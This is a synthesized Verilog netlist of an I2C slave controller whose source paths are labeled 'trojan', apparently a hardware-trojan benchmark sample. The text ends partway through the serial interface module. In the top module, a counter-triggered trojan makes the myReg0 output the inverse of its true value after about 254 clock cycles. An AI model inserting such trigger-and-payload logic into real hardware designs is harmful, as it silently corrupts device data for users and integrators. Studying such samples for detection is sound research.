/* Generated by Yosys 0.33 (git sha1 2584903a060) */

(* src = "trojan/i2cSlave.v:48.1-204.10" *)
module i2cSlave(clk, rst, sda, scl, myReg0, myReg1, myReg2, myReg3, myReg4, myReg5, myReg6, myReg7);
  (* src = "trojan/i2cSlave.v:101.1-106.4" *)
  (* unused_bits = "1" *)
  wire [1:0] _00_;
  wire _01_;
  wire _02_;
  wire _03_;
  wire _04_;
  wire _05_;
  (* src = "trojan/i2cSlave.v:121.9-121.41" *)
  wire _06_;
  (* src = "trojan/i2cSlave.v:125.9-125.41" *)
  wire _07_;
  (* src = "trojan/i2cSlave.v:157.27-157.58" *)
  wire _08_;
  (* src = "trojan/i2cSlave.v:164.46-164.77" *)
  wire _09_;
  (* src = "trojan/i2cSlave.v:157.9-157.58" *)
  wire _10_;
  (* src = "trojan/i2cSlave.v:157.9-157.93" *)
  wire _11_;
  (* src = "trojan/i2cSlave.v:164.11-164.77" *)
  wire _12_;
  (* src = "trojan/i2cSlave.v:166.16-166.82" *)
  wire _13_;
  (* src = "trojan/i2cSlave.v:191.8-191.35" *)
  wire _14_;
  wire _15_;
  wire [1:0] _16_;
  wire [1:0] _17_;
  (* src = "trojan/i2cSlave.v:123.14-123.38" *)
  wire _18_;
  (* src = "trojan/i2cSlave.v:127.14-127.38" *)
  wire _19_;
  (* src = "trojan/i2cSlave.v:86.6-86.23" *)
  wire clearStartStopDet;
  (* src = "trojan/i2cSlave.v:63.7-63.10" *)
  input clk;
  wire clk;
  (* src = "trojan/i2cSlave.v:92.12-92.25" *)
  wire [7:0] dataFromRegIF;
  (* src = "trojan/i2cSlave.v:90.12-90.23" *)
  wire [7:0] dataToRegIF;
  (* src = "trojan/i2cSlave.v:67.14-67.20" *)
  output [7:0] myReg0;
  wire [7:0] myReg0;
  (* src = "trojan/i2cSlave.v:68.14-68.20" *)
  output [7:0] myReg1;
  wire [7:0] myReg1;
  (* src = "trojan/i2cSlave.v:69.14-69.20" *)
  output [7:0] myReg2;
  wire [7:0] myReg2;
  (* src = "trojan/i2cSlave.v:70.14-70.20" *)
  output [7:0] myReg3;
  wire [7:0] myReg3;
  (* src = "trojan/i2cSlave.v:71.13-71.19" *)
  input [7:0] myReg4;
  wire [7:0] myReg4;
  (* src = "trojan/i2cSlave.v:72.13-72.19" *)
  input [7:0] myReg5;
  wire [7:0] myReg5;
  (* src = "trojan/i2cSlave.v:73.13-73.19" *)
  input [7:0] myReg6;
  wire [7:0] myReg6;
  (* src = "trojan/i2cSlave.v:74.13-74.19" *)
  input [7:0] myReg7;
  wire [7:0] myReg7;
  (* src = "trojan/i2cSlave.v:89.12-89.19" *)
  wire [7:0] regAddr;
  (* src = "trojan/i2cSlave.v:64.7-64.10" *)
  input rst;
  wire rst;
  (* src = "trojan/i2cSlave.v:93.11-93.18" *)
  reg [1:0] rstPipe;
  (* src = "trojan/i2cSlave.v:94.6-94.18" *)
  wire rstSyncToClk;
  (* src = "trojan/i2cSlave.v:66.7-66.10" *)
  input scl;
  wire scl;
  (* src = "trojan/i2cSlave.v:79.5-79.11" *)
  reg sclDeb;
  (* src = "trojan/i2cSlave.v:83.22-83.32" *)
  reg [9:0] sclDelayed;
  (* src = "trojan/i2cSlave.v:81.22-81.29" *)
  reg [9:0] sclPipe;
  (* src = "trojan/i2cSlave.v:65.7-65.10" *)
  inout sda;
  wire sda;
  (* src = "trojan/i2cSlave.v:78.5-78.11" *)
  reg sdaDeb;
  (* src = "trojan/i2cSlave.v:84.21-84.31" *)
  reg [3:0] sdaDelayed;
  (* src = "trojan/i2cSlave.v:88.6-88.11" *)
  wire sdaIn;
  (* src = "trojan/i2cSlave.v:87.6-87.12" *)
  wire sdaOut;
  (* src = "trojan/i2cSlave.v:80.22-80.29" *)
  reg [9:0] sdaPipe;
  (* src = "trojan/i2cSlave.v:95.5-95.17" *)
  reg startEdgeDet;
  (* src = "trojan/i2cSlave.v:85.11-85.28" *)
  reg [1:0] startStopDetState;
  (* src = "trojan/i2cSlave.v:91.6-91.13" *)
  wire writeEn;
  (* src = "trojan/i2cSlave.v:101.1-106.4" *)
  always @(posedge clk)
    if (rst) rstPipe[1] <= 1'h1;
    else rstPipe[1] <= rstPipe[0];
  (* src = "trojan/i2cSlave.v:101.1-106.4" *)
  always @(posedge clk)
    rstPipe[0] <= _00_[0];
  (* src = "trojan/i2cSlave.v:111.1-130.4" *)
  always @(posedge clk)
    if (rstPipe[1]) sclPipe <= 10'h3ff;
    else sclPipe <= { sclPipe[8:0], scl };
  (* src = "trojan/i2cSlave.v:111.1-130.4" *)
  always @(posedge clk)
    if (rstPipe[1]) sdaPipe <= 10'h3ff;
    else sdaPipe <= { sdaPipe[8:0], sda };
  (* src = "trojan/i2cSlave.v:111.1-130.4" *)
  always @(posedge clk)
    if (_03_) sclDeb <= 1'h1;
    else if (!_18_) sclDeb <= 1'h0;
  (* src = "trojan/i2cSlave.v:111.1-130.4" *)
  always @(posedge clk)
    if (_04_) sdaDeb <= 1'h1;
    else if (!_19_) sdaDeb <= 1'h0;
  (* src = "trojan/i2cSlave.v:139.1-148.4" *)
  always @(posedge clk)
    if (rstPipe[1]) sdaDelayed <= 4'hf;
    else sdaDelayed <= { sdaDelayed[2:0], sdaDeb };
  (* src = "trojan/i2cSlave.v:139.1-148.4" *)
  always @(posedge clk)
    if (rstPipe[1]) sclDelayed <= 10'h3ff;
    else sclDelayed <= { sclDelayed[8:0], sclDeb };
  (* src = "trojan/i2cSlave.v:151.1-170.4" *)
  always @(posedge clk)
    if (rstPipe[1]) startEdgeDet <= 1'h0;
    else startEdgeDet <= _15_;
  (* src = "trojan/i2cSlave.v:151.1-170.4" *)
  always @(posedge clk)
    if (_05_) startStopDetState <= 2'h0;
    else if (_02_) startStopDetState <= _17_;
  assign _01_ = | { _13_, _12_ };
  assign _02_ = & { sclDeb, _01_ };
  assign _03_ = | { _06_, rstPipe[1] };
  assign _04_ = | { _07_, rstPipe[1] };
  assign _05_ = | { rstPipe[1], clearStartStopDet };
  assign _09_ = ~ (* src = "trojan/i2cSlave.v:164.46-164.77" *) sdaDelayed[3];
  assign _08_ = ~ (* src = "trojan/i2cSlave.v:166.16-166.47" *) sdaDelayed[2];
  assign _10_ = sclDeb && (* src = "trojan/i2cSlave.v:157.9-157.58" *) _08_;
  assign _11_ = _10_ && (* src = "trojan/i2cSlave.v:157.9-157.93" *) sdaDelayed[3];
  assign _12_ = sdaDelayed[2] && (* src = "trojan/i2cSlave.v:164.11-164.77" *) _09_;
  assign _13_ = _08_ && (* src = "trojan/i2cSlave.v:166.16-166.82" *) sdaDelayed[3];
  assign _14_ = rstPipe[1] | (* src = "trojan/i2cSlave.v:191.8-191.35" *) startEdgeDet;
  assign _00_ = rst ? (* full_case = 32'd1 *) (* src = "trojan/i2cSlave.v:102.7-102.18|trojan/i2cSlave.v:102.3-105.35" *) 2'h3 : { rstPipe[0], 1'h0 };
  assign _15_ = _11_ ? (* full_case = 32'd1 *) (* src = "trojan/i2cSlave.v:157.9-157.93|trojan/i2cSlave.v:157.5-160.28" *) 1'h1 : 1'h0;
  assign _16_ = _13_ ? (* src = "trojan/i2cSlave.v:166.16-166.82|trojan/i2cSlave.v:166.12-167.36" *) 2'h1 : 2'hx;
  assign _17_ = _12_ ? (* full_case = 32'd1 *) (* src = "trojan/i2cSlave.v:164.11-164.77|trojan/i2cSlave.v:164.7-167.36" *) 2'h2 : _16_;
  assign _06_ = & (* src = "trojan/i2cSlave.v:121.9-121.33" *) sclPipe[9:1];
  assign _07_ = & (* src = "trojan/i2cSlave.v:125.9-125.33" *) sdaPipe[9:1];
  assign _18_ = | (* src = "trojan/i2cSlave.v:123.14-123.38" *) sclPipe[9:1];
  assign _19_ = | (* src = "trojan/i2cSlave.v:127.14-127.38" *) sdaPipe[9:1];
  assign sda = sdaOut ? (* src = "trojan/i2cSlave.v:97.14-97.44" *) 1'hz : 1'h0;
  (* module_not_derived = 32'd1 *)
  (* src = "trojan/i2cSlave.v:173.19-187.2" *)
  registerInterface u_registerInterface (
    .addr(regAddr),
    .clk(clk),
    .dataIn(dataToRegIF),
    .dataOut(dataFromRegIF),
    .myReg0(myReg0),
    .myReg1(myReg1),
    .myReg2(myReg2),
    .myReg3(myReg3),
    .myReg4(myReg4),
    .myReg5(myReg5),
    .myReg6(myReg6),
    .myReg7(myReg7),
    .writeEn(writeEn)
  );
  (* module_not_derived = 32'd1 *)
  (* src = "trojan/i2cSlave.v:189.17-201.2" *)
  serialInterface u_serialInterface (
    .clearStartStopDet(clearStartStopDet),
    .clk(clk),
    .dataIn(dataFromRegIF),
    .dataOut(dataToRegIF),
    .regAddr(regAddr),
    .rst(_14_),
    .scl(sclDelayed[9]),
    .sdaIn(sdaDeb),
    .sdaOut(sdaOut),
    .startStopDetState(startStopDetState),
    .writeEn(writeEn)
  );
  assign rstSyncToClk = rstPipe[1];
  assign sdaIn = sda;
endmodule

(* top =  1  *)
(* src = "trojan/i2cSlaveTop.v:48.1-105.10" *)
module i2cSlaveTop(clk, rst, sda, scl, myReg0);
  (* src = "trojan/i2cSlaveTop.v:92.25-92.46" *)
  wire [7:0] _0_;
  (* src = "trojan/i2cSlaveTop.v:94.9-94.32" *)
  wire _1_;
  (* src = "trojan/i2cSlaveTop.v:91.9-91.31" *)
  wire _2_;
  (* src = "trojan/i2cSlaveTop.v:62.12-62.24" *)
  wire [7:0] clean_myReg0;
  (* src = "trojan/i2cSlaveTop.v:56.7-56.10" *)
  input clk;
  wire clk;
  (* src = "trojan/i2cSlaveTop.v:60.14-60.20" *)
  output [7:0] myReg0;
  wire [7:0] myReg0;
  (* src = "trojan/i2cSlaveTop.v:57.7-57.10" *)
  input rst;
  wire rst;
  (* src = "trojan/i2cSlaveTop.v:59.7-59.10" *)
  input scl;
  wire scl;
  (* src = "trojan/i2cSlaveTop.v:58.7-58.10" *)
  inout sda;
  wire sda;
  (* src = "trojan/i2cSlaveTop.v:64.11-64.25" *)
  reg [7:0] trojan_counter;
  (* src = "trojan/i2cSlaveTop.v:67.12-67.26" *)
  wire [7:0] trojan_payload;
  (* src = "trojan/i2cSlaveTop.v:65.5-65.19" *)
  reg trojan_trigger;
  assign _0_ = trojan_counter + (* src = "trojan/i2cSlaveTop.v:92.25-92.46" *) 1'h1;
  (* src = "trojan/i2cSlaveTop.v:85.1-97.4" *)
  always @(posedge clk)
    if (rst) trojan_counter <= 8'h00;
    else if (_2_) trojan_counter <= _0_;
  (* src = "trojan/i2cSlaveTop.v:85.1-97.4" *)
  always @(posedge clk)
    if (rst) trojan_trigger <= 1'h0;
    else if (_1_) trojan_trigger <= 1'h1;
  assign trojan_payload = ~ clean_myReg0;
  assign _1_ = trojan_counter == (* src = "trojan/i2cSlaveTop.v:94.9-94.32" *) 8'hfe;
  assign _2_ = trojan_counter < (* src = "trojan/i2cSlaveTop.v:91.9-91.31" *) 8'hff;
  assign myReg0 = trojan_trigger ? (* src = "trojan/i2cSlaveTop.v:103.17-103.63" *) trojan_payload : clean_myReg0;
  (* module_not_derived = 32'd1 *)
  (* src = "trojan/i2cSlaveTop.v:69.10-82.2" *)
  i2cSlave u_i2cSlave (
    .clk(clk),
    .myReg0(clean_myReg0),
    .myReg4(8'h12),
    .myReg5(8'h34),
    .myReg6(8'h56),
    .myReg7(8'h78),
    .rst(rst),
    .scl(scl),
    .sda(sda)
  );
endmodule

(* src = "trojan/registerInterface.v:50.1-113.10" *)
module registerInterface(clk, addr, dataIn, writeEn, dataOut, myReg0, myReg1, myReg2, myReg3, myReg4, myReg5, myReg6, myReg7);
  (* src = "trojan/registerInterface.v:87.1-99.4" *)
  wire [7:0] _00_;
  wire _01_;
  wire _02_;
  wire _03_;
  wire _04_;
  wire _05_;
  wire _06_;
  wire _07_;
  wire _08_;
  wire _09_;
  wire _10_;
  wire _11_;
  wire _12_;
  (* src = "trojan/registerInterface.v:67.13-67.17" *)
  input [7:0] addr;
  wire [7:0] addr;
  (* src = "trojan/registerInterface.v:66.7-66.10" *)
  input clk;
  wire clk;
  (* src = "trojan/registerInterface.v:68.13-68.19" *)
  input [7:0] dataIn;
  wire [7:0] dataIn;
  (* src = "trojan/registerInterface.v:70.14-70.21" *)
  output [7:0] dataOut;
  reg [7:0] dataOut;
  (* src = "trojan/registerInterface.v:71.14-71.20" *)
  output [7:0] myReg0;
  reg [7:0] myReg0;
  (* src = "trojan/registerInterface.v:72.14-72.20" *)
  output [7:0] myReg1;
  reg [7:0] myReg1;
  (* src = "trojan/registerInterface.v:73.14-73.20" *)
  output [7:0] myReg2;
  reg [7:0] myReg2;
  (* src = "trojan/registerInterface.v:74.14-74.20" *)
  output [7:0] myReg3;
  reg [7:0] myReg3;
  (* src = "trojan/registerInterface.v:75.13-75.19" *)
  input [7:0] myReg4;
  wire [7:0] myReg4;
  (* src = "trojan/registerInterface.v:76.13-76.19" *)
  input [7:0] myReg5;
  wire [7:0] myReg5;
  (* src = "trojan/registerInterface.v:77.13-77.19" *)
  input [7:0] myReg6;
  wire [7:0] myReg6;
  (* src = "trojan/registerInterface.v:78.13-78.19" *)
  input [7:0] myReg7;
  wire [7:0] myReg7;
  (* src = "trojan/registerInterface.v:69.7-69.14" *)
  input writeEn;
  wire writeEn;
  (* src = "trojan/registerInterface.v:102.1-111.4" *)
  always @(posedge clk)
    if (_01_) myReg0 <= dataIn;
  (* src = "trojan/registerInterface.v:102.1-111.4" *)
  always @(posedge clk)
    if (_02_) myReg1 <= dataIn;
  (* src = "trojan/registerInterface.v:102.1-111.4" *)
  always @(posedge clk)
    if (_03_) myReg2 <= dataIn;
  (* src = "trojan/registerInterface.v:102.1-111.4" *)
  always @(posedge clk)
    if (_04_) myReg3 <= dataIn;
  assign _01_ = & { _08_, writeEn };
  assign _02_ = & { _07_, writeEn };
  assign _03_ = & { _06_, writeEn };
  assign _04_ = & { _05_, writeEn };
  (* src = "trojan/registerInterface.v:87.1-99.4" *)
  always @(posedge clk)
    dataOut <= _00_;
  function [7:0] _22_;
    input [7:0] a;
    input [63:0] b;
    input [7:0] s;
    (* full_case = 32'd1 *)
    (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *)
    (* parallel_case *)
    casez (s)
      8'b???????1:
        _22_ = b[7:0];
      8'b??????1?:
        _22_ = b[15:8];
      8'b?????1??:
        _22_ = b[23:16];
      8'b????1???:
        _22_ = b[31:24];
      8'b???1????:
        _22_ = b[39:32];
      8'b??1?????:
        _22_ = b[47:40];
      8'b?1??????:
        _22_ = b[55:48];
      8'b1???????:
        _22_ = b[63:56];
      default:
        _22_ = a;
    endcase
  endfunction
  assign _00_ = _22_(8'h00, { myReg0, myReg1, myReg2, myReg3, myReg4, myReg5, myReg6, myReg7 }, { _08_, _07_, _06_, _05_, _12_, _11_, _10_, _09_ });
  assign _09_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h07;
  assign _10_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h06;
  assign _11_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h05;
  assign _12_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h04;
  assign _05_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h03;
  assign _06_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h02;
  assign _07_ = addr == (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) 8'h01;
  assign _08_ = ! (* full_case = 32'd1 *) (* src = "trojan/registerInterface.v:0.0-0.0|trojan/registerInterface.v:88.3-98.10" *) addr;
endmodule

(* src = "trojan/serialInterface.v:57.1-364.10" *)
module serialInterface(clearStartStopDet, clk, dataIn, dataOut, regAddr, rst, scl, sdaIn, sdaOut, startStopDetState, writeEn);
  (* src = "trojan/serialInterface.v:148.25-148.39" *)
  wire [7:0] _000_;
  (* src = "trojan/serialInterface.v:182.24-182.37" *)
  wire [2:0] _001_;
  wire _002_;
  wire _003_;
  wire _004_;
  wire _005_;
  wire _006_;
  wire _007_;
  wire _008_;
  wire _009_;
  wire _010_;
  wire _011_;
  wire _012_;
  wire _013_;
  wire _014_;
  wire _015_;
  wire _016_;
  wire _017_;
  wire _018_;
  wire _019_;
  wire _020_;
  wire _021_;
  wire _022_;
  wire _023_;
  wire _024_;
  wire _025_;
  wire _026_;
  wire _027_;
  wire _028_;
  wire _029_;
  wire _030_;
  wire _031_;
  wire _032_;
  wire _033_;
  wire _034_;
  wire _035_;
  wire _036_;
  wire _037_;
  wire _038_;
  wire _039_;
  wire _040_;
  wire _041_;
  wire _042_;
  wire _043_;
  wire _044_;
  wire _045_;
  wire _046_;
  wire _047_;
  wire _048_;
  wire _049_;
  wire _050_;
  wire _051_;
  wire _052_;
  (* src = "trojan/serialInterface.v:144.11-144.28" *)
  wire _053_;
  (* src = "trojan/serialInterface.v:159.11-159.22" *)
  wire _054_;
  (* src = "trojan/serialInterface.v:175.11-175.27" *)
  wire _055_;
  (* src = "trojan/serialInterface.v:204.29-204.55" *)
  wire _056_;
  (* src = "trojan/serialInterface.v:205.10-205.27" *)
  wire _057_;
  (* src = "trojan/serialInterface.v:205.31-205.57" *)
  wire _058_;
  (* src = "trojan/serialInterface.v:245.11-245.27" *)
  wire _059_;
  (* src = "trojan/serialInterface.v:251.13-251.33" *)
  wire _060_;
  (* src = "trojan/serialInterface.v:252.9-252.35" *)
  wire _061_;
  (* src = "trojan/serialInterface.v:204.11-205.59" *)
  wire _062_;
  (* src = "trojan/serialInterface.v:205.10-205.57" *)
  wire _063_;
  (* src = "trojan/serialInterface.v:251.13-252.35" *)
  wire _064_;
  (* src = "trojan/serialInterface.v:204.29-205.58" *)
  wire _065_;
  wire [7:0] _066_;
  wire _067_;
  wire [7:0] _068_;
  wire _069_;
  wire [7:0] _070_;
  wire _071_;
  wire [7:0] _072_;
  wire _073_;
  wire _074_;
  wire _075_;
  wire _076_;
  wire _077_;
  wire _078_;
  wire [2:0] _079_;
  wire [2:0] _080_;
  wire _081_;
  wire [2:0] _082_;
  wire [2:0] _083_;
  wire [2:0] _084_;
  wire [2:0] _085_;
  wire _086_;
  wire [2:0] _087_;
  wire [7:0] _088_;
  wire _089_;
  wire [7:0] _090_;
  wire _091_;
  wire _092_;
  wire _093_;
  wire _094_;
  wire _095_;
  wire _096_;
  wire _097_;
  wire _098_;
  wire _099_;
  wire _100_;
  wire [7:0] _101_;
  wire _102_;
  wire [7:0] _103_;
  wire [7:0] _104_;
  wire [7:0] _105_;
  wire [7:0] _106_;
  wire [7:0] _107_;
  wire [7:0] _108_;
  wire [1:0] _109_;
  wire [1:0] _110_;
  wire [1:0] _111_;
  wire [1:0] _112_;
  wire [1:0] _113_;
  wire [1:0] _114_;
  wire [1:0] _115_;
  wire [1:0] _116_;
  wire [1:0] _117_;
  wire _118_;
  wire [3:0] _119_;
  wire [3:0] _120_;
  wire [3:0] _121_;
  wire [3:0] _122_;
  wire _123_;
  wire [3:0] _124_;
  wire [3:0] _125_;
  wire [3:0] _126_;
  wire [3:0] _127_;
  wire [3:0] _128_;
  wire [3:0] _129_;
  wire [3:0] _130_;
  wire [3:0] _131_;
  wire _132_;
  wire [3:0] _133_;
  wire [3:0] _134_;
  (* src = "trojan/serialInterface.v:107.10-107.24" *)
  reg [3:0] CurrState_SISt;
  (* src = "trojan/serialInterface.v:107.26-107.40" *)
  wire [3:0] NextState_SISt;
  (* src = "trojan/serialInterface.v:83.11-83.17" *)
  reg [2:0] bitCnt;
  (* src = "trojan/serialInterface.v:64.9-64.26" *)
  output clearStartStopDet;
  reg clearStartStopDet;
  (* src = "trojan/serialInterface.v:58.9-58.12" *)
  input clk;
  wire clk;
  (* src = "trojan/serialInterface.v:59.14-59.20" *)
  input [7:0] dataIn;
  wire [7:0] dataIn;
  (* src = "trojan/serialInterface.v:65.14-65.21" *)
  output [7:0] dataOut;
  reg [7:0] dataOut;
  (* src = "trojan/serialInterface.v:83.19-83.30" *)
  wire [2:0] next_bitCnt;
  (* src = "trojan/serialInterface.v:70.28-70.50" *)
  wire next_clearStartStopDet;
  (* src = "trojan/serialInterface.v:73.23-73.35" *)
  wire [7:0] next_dataOut;
  (* src = "trojan/serialInterface.v:74.23-74.35" *)
  wire [7:0] next_regAddr;
  (* src = "trojan/serialInterface.v:84.19-84.30" *)
  wire [7:0] next_rxData;
  (* src = "trojan/serialInterface.v:78.17-78.28" *)
  wire next_sdaOut;
  (* src = "trojan/serialInterface.v:85.21-85.34" *)
  wire [1:0] next_streamSt;
  (* src = "trojan/serialInterface.v:86.19-86.30" *)
  wire [7:0] next_txData;
  (* src = "trojan/serialInterface.v:80.18-80.30" *)
  wire next_writeEn;
  (* src = "trojan/serialInterface.v:66.14-66.21" *)
  output [7:0] regAddr;
  reg [7:0] regAddr;
  (* src = "trojan/serialInterface.v:60.9-60.12" *)
  input rst;
  wire rst;
  (* src = "trojan/serialInterface.v:84.11-84.17" *)
  reg [7:0] rxData;
  (* src = "trojan/serialInterface.v:61.9-61.12" *)
  input scl;
  wire scl;
  (* src = "trojan/serialInterface.v:62.9-62.14" *)
  input sdaIn;
  wire sdaIn;
  (* src = "trojan/serialInterface.v:67.9-67.15" *)
  output sdaOut;
  reg sdaOut;
  (* src = "trojan/serialInterface.v:63.14-63.31" *)
  input [1:0] startStopDetState;
  wire [1:0] startStopDetState;
  (* src = "trojan/serialInterface.v:85.11-85.19" *)
  reg [1:0] streamSt;
  (* src = "trojan/serialInterface.v:86.11-86.17" *)
  reg [7:0] txData;
  (* src = "trojan/serialInterface.v:68.9-68.16" *)
  output writeEn;
  reg writeEn;
  assign _001_ = bitCnt + (* src = "trojan/serialInterface.v:276.24-276.37" *) 1'h1;
  assign _000_ = regAddr + (* src = "trojan/serialInterface.v:313.23-313.37" *) 1'h1;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) writeEn <= 1'h0;
    else if (_037_) writeEn <= next_writeEn;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) dataOut <= 8'h00;
    else if (_038_) dataOut <= next_dataOut;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) clearStartStopDet <= 1'h0;
    else if (_039_) clearStartStopDet <= next_clearStartStopDet;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (_040_) regAddr <= next_regAddr;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) sdaOut <= 1'h1;
    else if (_041_) sdaOut <= next_sdaOut;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) bitCnt <= 3'h0;
    else if (_042_) bitCnt <= next_bitCnt;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) rxData <= 8'h00;
    else if (_043_) rxData <= next_rxData;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) streamSt <= 2'h0;
    else if (_044_) streamSt <= next_streamSt;
  (* src = "trojan/serialInterface.v:336.1-362.4" *)
  always @(posedge clk)
    if (rst) txData <= 8'h00;
    else if (_045_) txData <= next_txData;
  (* src = "trojan/serialInterface.v:327.1-333.4" *)
  always @(posedge clk)
    if (rst) CurrState_SISt <= 4'h0;
    else if (_046_) CurrState_SISt <= NextState_SISt;
  assign _002_ = { _071_, _059_ } != 2'h2;
  assign _003_ = { _089_, _071_, _059_ } != 3'h3;
  assign _004_ = | { _047_, _071_ };
  assign _005_ = | { _078_, _071_ };
  assign _006_ = | { _077_, _067_, _049_ };
  assign _007_ = { _077_, _062_ } != 2'h2;
  assign _008_ = { _067_, writeEn } != 2'h2;
  assign _009_ = { _073_, _053_ } != 2'h2;
  assign _010_ = { _071_, _069_, _059_ } != 3'h5;
  assign _011_ = | { _073_, _071_, _067_ };
  assign _012_ = { _100_, scl } != 2'h3;
  assign _013_ = { _050_, scl } != 2'h3;
  assign _014_ = | { _050_, _100_, _078_, _071_ };
  assign _015_ = { _081_, scl } != 2'h2;
  assign _016_ = { _077_, _062_, scl } != 3'h5;
  assign _017_ = { _086_, _055_ } != 2'h3;
  assign _018_ = { _071_, _059_ } != 2'h3;
  assign _019_ = | { _086_, _081_, _078_, _077_, _073_, _071_ };
  assign _020_ = { _051_, scl } != 2'h2;
  assign _021_ = { _073_, _053_ } != 2'h3;
  assign _022_ = | { _051_, _078_, _077_, _073_ };
  assign _023_ = { _077_, _061_, _062_, scl } != 4'h8;
  assign _024_ = { _118_, scl } != 2'h2;
  assign _025_ = { _118_, sdaIn, scl } != 3'h5;
  assign _026_ = { _071_, _069_, _059_, _057_ } != 4'ha;
  assign _027_ = { _071_, _064_, _059_, _057_ } != 4'hb;
  assign _028_ = | { _118_, _078_, _077_, _071_ };
  assign _029_ = | { _100_, _078_, _073_ };
  assign _030_ = { _075_, scl } != 2'h2;
  assign _031_ = { _102_, scl } != 2'h2;
  assign _032_ = { _132_, scl } != 2'h2;
  assign _033_ = { _094_, scl } != 2'h3;
  assign _034_ = { _098_, scl } != 2'h3;
  assign _035_ = { _123_, scl } != 2'h3;
  assign _036_ = | { _048_, _132_, _123_, _118_, _102_, _100_, _098_, _094_, _086_, _081_, _077_, _075_, _073_, _071_, _067_ };
  assign _052_ = ~ rst;
  assign _037_ = & { _002_, _003_, _004_ };
  assign _038_ = & { _002_, _003_, _005_ };
  assign _039_ = & { _007_, _006_ };
  assign _040_ = & { _002_, _008_, _009_, _010_, _011_, _052_ };
  assign _041_ = & { _002_, _012_, _013_, _014_ };
  assign _042_ = & { _009_, _015_, _016_, _017_, _018_, _019_ };
  assign _043_ = & { _016_, _020_, _021_, _022_ };
  assign _044_ = & { _002_, _016_, _023_, _024_, _025_, _026_, _027_, _028_ };
  assign _045_ = & { _009_, _012_, _029_ };
  assign _046_ = & { _012_, _015_, _016_, _024_, _030_, _031_, _032_, _033_, _034_, _035_, _036_ };
  assign _047_ = | { _078_, _067_ };
  assign _048_ = | { _078_, _074_ };
  assign _049_ = | { _078_, _075_, _074_ };
  assign _050_ = | { _098_, _094_ };
  assign _051_ = | { _102_, _081_ };
  assign _053_ = streamSt == (* src = "trojan/serialInterface.v:144.11-144.28" *) 2'h1;
  assign _055_ = ! (* src = "trojan/serialInterface.v:175.11-175.27" *) bitCnt;
  assign _056_ = startStopDetState == (* src = "trojan/serialInterface.v:204.29-204.55" *) 2'h2;
  assign _059_ = bitCnt == (* src = "trojan/serialInterface.v:245.11-245.27" *) 3'h7;
  assign _060_ = rxData[7:1] == (* src = "trojan/serialInterface.v:251.13-251.33" *) 7'h3c;
  assign _054_ = ~ (* src = "trojan/serialInterface.v:296.11-296.22" *) scl;
  assign _062_ = _054_ && (* src = "trojan/serialInterface.v:204.11-205.59" *) _065_;
  assign _063_ = _057_ && (* src = "trojan/serialInterface.v:205.10-205.57" *) _058_;
  assign _064_ = _060_ && (* src = "trojan/serialInterface.v:251.13-252.35" *) _061_;
  assign _065_ = _056_ || (* src = "trojan/serialInterface.v:204.29-205.58" *) _063_;
  assign _066_ = writeEn ? (* src = "trojan/serialInterface.v:312.11-312.26|trojan/serialInterface.v:312.7-313.38" *) _000_ : 8'hxx;
  function [7:0] _209_;
    input [7:0] a;
    input [23:0] b;
    input [2:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      3'b??1:
        _209_ = b[7:0];
      3'b?1?:
        _209_ = b[15:8];
      3'b1??:
        _209_ = b[23:16];
      default:
        _209_ = a;
    endcase
  endfunction
  assign next_regAddr = _209_(8'hxx, { _072_, _070_, _066_ }, { _073_, _071_, _067_ });
  assign _068_ = _069_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:249.9-271.16" *) rxData : 8'hxx;
  assign _070_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) _068_ : 8'hxx;
  assign _072_ = _053_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:144.11-144.28|trojan/serialInterface.v:144.7-155.10" *) _000_ : 8'hxx;
  function [0:0] _213_;
    input [0:0] a;
    input [2:0] b;
    input [2:0] s;
    (* full_case = 32'd1 *)
    (* parallel_case = 32'd1 *)
    (* src = "trojan/serialInterface.v:0.0-0.0|trojan/serialInterface.v:129.3-323.10" *)
    (* parallel_case *)
    casez (s)
      3'b??1:
        _213_ = b[0:0];
      3'b?1?:
        _213_ = b[1:1];
      3'b1??:
        _213_ = b[2:2];
      default:
        _213_ = a;
    endcase
  endfunction
  assign next_clearStartStopDet = _213_(1'hx, { _076_, 2'h2 }, { _077_, _067_, _049_ });
  assign _076_ = _062_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:204.11-205.59|trojan/serialInterface.v:204.7-232.10" *) 1'h1 : 1'hx;
  assign _079_ = _059_ ? (* full_case = 32'd1 *) (* src = "trojan/serialInterface.v:245.11-245.27|trojan/serialInterface.v:245.7-277.10" *) 3'hx : _001_;
